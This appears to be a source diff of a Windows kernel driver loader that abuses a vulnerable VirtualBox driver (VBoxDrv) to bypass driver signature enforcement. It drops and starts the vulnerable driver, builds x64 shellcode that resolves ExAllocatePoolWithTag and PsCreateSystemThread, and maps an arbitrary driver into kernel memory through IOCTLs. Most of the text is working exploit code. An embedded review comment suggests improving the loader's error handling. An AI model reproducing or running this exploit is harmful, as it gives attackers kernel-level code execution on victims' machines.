pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; - RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); - pLoadTask->u.In.cbImage = CodeSize; + pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + pLoadTask->Hdr.cbIn = + (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; + pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; + pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; + pLoadTask->Hdr.rc = 0; + pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; + pLoadTask->u.In.pvImageBase = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; + RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); + pLoadTask->u.In.cbImage = CodeSize; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, - pLoadTask, pLoadTask->Hdr.cbIn, - pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) - { - 
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase, _strend(text)); - _strcat(text, TEXT(", size = 0x")); - ultohex(CodeSize, _strend(text)); + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, + pLoadTask, pLoadTask->Hdr.cbIn, + pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase, _strend(text)); + _strcat(text, TEXT(", size = 0x")); + ultohex(CodeSize, _strend(text)); - _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); - vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - vmFast.Hdr.rc = 0; - vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; - vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; - vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; + RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); + vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + vmFast.Hdr.rc = 0; + vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; + vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; + vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, - 
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, - &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); + } - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); - paramOut = 0; - DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, - NULL, 0, - ¶mOut, sizeof(paramOut), &bytesIO, NULL); + paramOut = 0; + DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, + NULL, 0, + ¶mOut, sizeof(paramOut), &bytesIO, NULL); - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); - ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; - ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; - ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - ldrFree.Hdr.rc = 0; - ldrFree.u.In.pvImageBase = ImageBase; + RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); + ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; + ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; + ldrFree.Hdr.fFlags = 
SUPREQHDR_FLAGS_DEFAULT; + ldrFree.Hdr.rc = 0; + ldrFree.u.In.pvImageBase = ImageBase; - DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); + DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); - break; - } + break; + } - if (pLoadTask != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); - } + if (pLoadTask != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); + } - if (g_hVBox != INVALID_HANDLE_VALUE) { - CloseHandle(g_hVBox); - g_hVBox = INVALID_HANDLE_VALUE; - } + if (g_hVBox != INVALID_HANDLE_VALUE) { + CloseHandle(g_hVBox); + g_hVBox = INVALID_HANDLE_VALUE; + } } /* 
@@ -376,129 +376,129 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName - ) + LPWSTR lpDriverFullName +) { - UINT result = (UINT)-1; - ULONG isz; - SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; - HMODULE Image = NULL; - PIMAGE_NT_HEADERS FileHeader; - PBYTE Buffer = NULL; - UNICODE_STRING uStr; - ANSI_STRING routineName; - NTSTATUS status; - WCHAR text[256]; + UINT result = (UINT)-1; + ULONG isz; + SIZE_T memIO; + ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + HMODULE Image = NULL; + PIMAGE_NT_HEADERS FileHeader; + PBYTE Buffer = NULL; + UNICODE_STRING uStr; + ANSI_STRING routineName; + NTSTATUS status; + WCHAR text[256]; - KernelBase = supGetNtOsBase(); - while (KernelBase != 0) { + KernelBase = supGetNtOsBase(); + while (KernelBase != 0) { - _strcpy(text, TEXT("Ldr: Kernel base = 0x")); - u64tohex(KernelBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Kernel base = 0x")); + u64tohex(KernelBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&uStr, sizeof(uStr)); - RtlInitUnicodeString(&uStr, lpDriverFullName); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); - if ((!NT_SUCCESS(status)) || (Image == NULL)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); - u64tohex((ULONG_PTR)Image, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlSecureZeroMemory(&uStr, sizeof(uStr)); + RtlInitUnicodeString(&uStr, lpDriverFullName); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); + if ((!NT_SUCCESS(status)) || (Image == NULL)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, 
TEXT("Ldr: Input driver file loaded at 0x")); + u64tohex((ULONG_PTR)Image, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - FileHeader = RtlImageNtHeader(Image); - if (FileHeader == NULL) - break; + FileHeader = RtlImageNtHeader(Image); + if (FileHeader == NULL) + break; - isz = FileHeader->OptionalHeader.SizeOfImage; + isz = FileHeader->OptionalHeader.SizeOfImage; - cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); - if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); - u64tohex(KernelImage, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); + if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); + u64tohex(KernelImage, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "ExAllocatePoolWithTag"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); - if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); - u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + 
RtlInitString(&routineName, "ExAllocatePoolWithTag"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); + if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); + u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - memIO = isz + PAGE_SIZE; - NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); - if (Buffer == NULL) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); - 
u64tohex((ULONG_PTR)Buffer, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + memIO = isz + PAGE_SIZE; + NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (Buffer == NULL) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); + u64tohex((ULONG_PTR)Buffer, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - // mov rcx, ExAllocatePoolWithTag - // mov rdx, PsCreateSystemThread + // mov rcx, ExAllocatePoolWithTag + // mov rdx, PsCreateSystemThread - Buffer[0x00] = 0x48; // mov rcx, xxxxx - Buffer[0x01] = 0xb9; - *((PULONG_PTR)&Buffer[2]) = - KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x00] = 0x48; // mov rcx, xxxxx + Buffer[0x01] = 0xb9; + *((PULONG_PTR)&Buffer[2]) = + KernelBase + (xExAllocatePoolWithTag - KernelImage); + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + RtlCopyMemory(Buffer + 0x14, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + RtlCopyMemory(Buffer + scDataOffset, Image, isz); - cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); + TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); - cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), 
g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); - result = 0; - break; - } + cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); + TDLExploit(Buffer, isz + PAGE_SIZE); + result = 0; + break; + } - if (Buffer != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); - } + if (Buffer != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); + } - return result; + return result; } /* 
@@ -510,123 +510,123 @@ UINT TDLMapDriver( * */ HANDLE TDLStartVulnerableDriver( - VOID - ) + VOID +) { - PBYTE DrvBuffer; - ULONG DataSize = 0, bytesIO; - HANDLE hDevice = INVALID_HANDLE_VALUE; - WCHAR szDriverFileName[MAX_PATH * 2]; - SC_HANDLE schSCManager = NULL; - LPWSTR msg; + PBYTE DrvBuffer; + ULONG DataSize = 0, bytesIO; + HANDLE hDevice = INVALID_HANDLE_VALUE; + WCHAR szDriverFileName[MAX_PATH * 2]; + SC_HANDLE schSCManager = NULL; + LPWSTR msg; - DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); - while (DrvBuffer != NULL) { + DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); + while (DrvBuffer != NULL) { - //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. - RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); - if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { + //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. + RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); + if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error opening SCM database"), - g_ConsoleOutput, TRUE); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error opening SCM database"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive - if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Active 
VirtualBox found in system, attempt unload it"), - g_ConsoleOutput, TRUE); + //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive + if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), + g_ConsoleOutput, TRUE); - if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetAdp driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetLwf driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxUSBMon driver unloaded"), - g_ConsoleOutput, TRUE); - } - Sleep(1000); - if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxDrv driver unloaded"), - g_ConsoleOutput, TRUE); - } - } + if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetAdp driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetLwf driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxUSBMon driver unloaded"), + g_ConsoleOutput, TRUE); + } + Sleep(1000); + if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxDrv driver unloaded"), + g_ConsoleOutput, TRUE); + } + } - //if vbox installed backup it driver, do it before dropping our - if (g_VBoxInstalled) { - if (supBackupVBoxDrv(FALSE) == FALSE) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error while doing VirtualBox driver backup"), - g_ConsoleOutput, TRUE); + //if vbox installed backup it driver, do it before dropping our + if (g_VBoxInstalled) { + if (supBackupVBoxDrv(FALSE) == FALSE) { + 
cuiPrintText(g_ConOut, + TEXT("Ldr: Error while doing VirtualBox driver backup"), + g_ConsoleOutput, TRUE); - break; - } - } + break; + } + } - //drop our vboxdrv version - _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); - bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, - (SIZE_T)DataSize, FALSE, FALSE); + //drop our vboxdrv version + _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); + bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, + (SIZE_T)DataSize, FALSE, FALSE); - if (bytesIO != DataSize) { + if (bytesIO != DataSize) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error writing VirtualBox on disk"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error writing VirtualBox on disk"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //if vbox not found in system install driver in scm - if (g_VBoxInstalled == FALSE) { - scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); - } + //if vbox not found in system install driver in scm + if (g_VBoxInstalled == FALSE) { + scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); + } - //run driver - if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) { + //run driver + if (scmStartDriver(schSCManager, VBoxDrvSvc) != FALSE) { - if (scmOpenDevice(VBoxDrvSvc, &hDevice)) - msg = TEXT("SCM: Vulnerable driver loaded and opened"); - else - msg = TEXT("SCM: Driver device open failure"); + if (scmOpenDevice(VBoxDrvSvc, &hDevice)) + msg = TEXT("SCM: Vulnerable driver loaded and opened"); + else + msg = TEXT("SCM: Driver device open failure"); - } - else { - msg = TEXT("SCM: Vulnerable driver load failure"); - } + } + else { + msg = TEXT("SCM: Vulnerable driver load failure"); + } - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - break; - } + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + break; + } - //post cleanup - if (schSCManager != NULL) { - CloseServiceHandle(schSCManager); - } - return hDevice; + //post cleanup + if 
(schSCManager != NULL) { + CloseServiceHandle(schSCManager); + } + return hDevice; } /* 
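Review bot: The return value of `scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName);` is still discarded, so when the service entry cannot be created the loop falls through to `scmStartDriver` and reports the generic "SCM: Vulnerable driver load failure" rather than the real cause. Guard it in the same style as the steps above it, e.g. `if (!scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName)) { msg = TEXT("SCM: Driver install failure"); break; }` followed by the existing `cuiPrintText(g_ConOut, msg, ...)` before the `break` (the post-cleanup path already handles the open SCM handle). A smaller point of least privilege: `OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)` asks for far more than the create/open/start operations used here appear to need; `SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE` should suffice, presumably — worth confirming against the scm* helpers, which are outside this hunk.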
@@ -638,72 +638,74 @@ HANDLE TDLStartVulnerableDriver( * */ void TDLStopVulnerableDriver( - VOID - ) + VOID +) { - SC_HANDLE schSCManager; - LPWSTR msg; - UNICODE_STRING uStr; - OBJECT_ATTRIBUTES ObjectAttributes; + SC_HANDLE schSCManager; + LPWSTR msg; + UNICODE_STRING uStr; + OBJECT_ATTRIBUTES ObjectAttributes; - cuiPrintText(g_ConOut, - TEXT("SCM: Unloading vulnerable driver"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("SCM: Unloading vulnerable driver"), + g_ConsoleOutput, TRUE); - if (g_hVBox != INVALID_HANDLE_VALUE) - CloseHandle(g_hVBox); + if (g_hVBox != INVALID_HANDLE_VALUE) + CloseHandle(g_hVBox); - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("SCM: Cannot open database, unable unload driver"), - g_ConsoleOutput, TRUE); - return; - } + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("SCM: Cannot open database, unable unload driver"), + g_ConsoleOutput, TRUE); + return; + } + //stop driver in any case + if (scmStopDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Vulnerable driver successfully unloaded"); + else + msg = TEXT("SCM: Unexpected error while unloading driver"); - //stop driver in any case - if (scmStopDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Vulnerable driver successfully unloaded"); - else - msg = TEXT("SCM: Unexpected error while unloading driver"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + //if VBox not installed - remove from scm database and delete file + if (g_VBoxInstalled == FALSE) { - //if VBox not installed - remove from scm database and delete file - if (g_VBoxInstalled == FALSE) { + if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Driver entry removed from registry"); + else + msg = TEXT("SCM: Error removing driver entry from registry"); - if 
(scmRemoveDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Driver entry removed from registry"); - else - msg = TEXT("SCM: Error removing driver entry from registry"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + uStr.Buffer = NULL; + uStr.Length = 0; + uStr.MaximumLength = 0; + RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); + InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); + if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) + msg = TEXT("Ldr: Driver file removed"); + else + msg = TEXT("Ldr: Error removing driver file"); - RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); - InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); - if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) - msg = TEXT("Ldr: Driver file removed"); - else - msg = TEXT("Ldr: Error removing driver file"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + else { + //VBox software present, restore original driver and exit + if (supBackupVBoxDrv(TRUE)) + msg = TEXT("Ldr: Original driver restored"); + else + msg = TEXT("Ldr: Unexpected error while restoring original driver"); - } - else { - //VBox software present, restore original driver and exit - if (supBackupVBoxDrv(TRUE)) - msg = TEXT("Ldr: Original driver restored"); - else - msg = TEXT("Ldr: Unexpected error while restoring original driver"); - - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - } - CloseServiceHandle(schSCManager); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + CloseServiceHandle(schSCManager); } /* 
